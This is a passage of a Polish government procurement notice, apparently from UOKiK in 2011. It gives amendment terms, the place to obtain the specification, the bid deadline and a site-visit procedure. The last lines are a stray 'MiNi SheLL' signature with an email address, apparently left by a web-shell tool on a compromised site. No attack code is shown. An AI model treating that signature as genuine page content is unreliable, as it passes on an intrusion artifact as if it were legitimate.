 podatku VAT mających związek z niniejszym przedmiotem zamówienia,
 
Jeżeli w trakcie realizacji umowy Zamawiający lub Wykonawca dojdzie do wniosku, że              w celu właściwej realizacji zamówienia istnieje potrzeba dokonania przewidzianej przez Zamawiającego w SIWZ zmiany postanowień zawartej umowy w stosunku do treści wybranej oferty, to każda ze stron może się zwrócić do drugiej na piśmie z wnioskiem                    o dokonanie takiej zmiany,
Zmiany będą dokonywane na piśmie w postaci aneksu do zawartej umowy po uprzednim wyrażeniu zgody na zmianę przez obie strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uokik.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Ochrony Konkurencji i Konsumentów,
pl. Powstańców Warszawy 1,
00 - 950 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2011 godzina 10:00, miejsce: Warszawa (00 - 950), pl. Powstańców Warszawy 1, Kancelaria pokój nr 116 (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Każdy z Wykonawców ma możliwość dokonania wizji lokalnej w celu sprawdzenia, 
warunków związanych z wykonaniem usług będących przedmiotem przetargu,                              w zakresie skalkulowania ceny przez Wykonawcę. 
Termin wizji ustala się na dzień 7.12.2011 r. godz. 12:00 Zbiórka zainteresowanych Wykonawców w holu Budynku UOKiK przy Pl. Powstańców 1 (wejście od strony gości Urzędu). 
Zainteresowany Wykonawca zobowiązany jest do dnia 06.12.2011 r. przesłać faksem na nr 22 826 20 30 wykaz osób (imię i nazwisko, nr dowodu osobistego), które mają wziąć udział w wizji..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com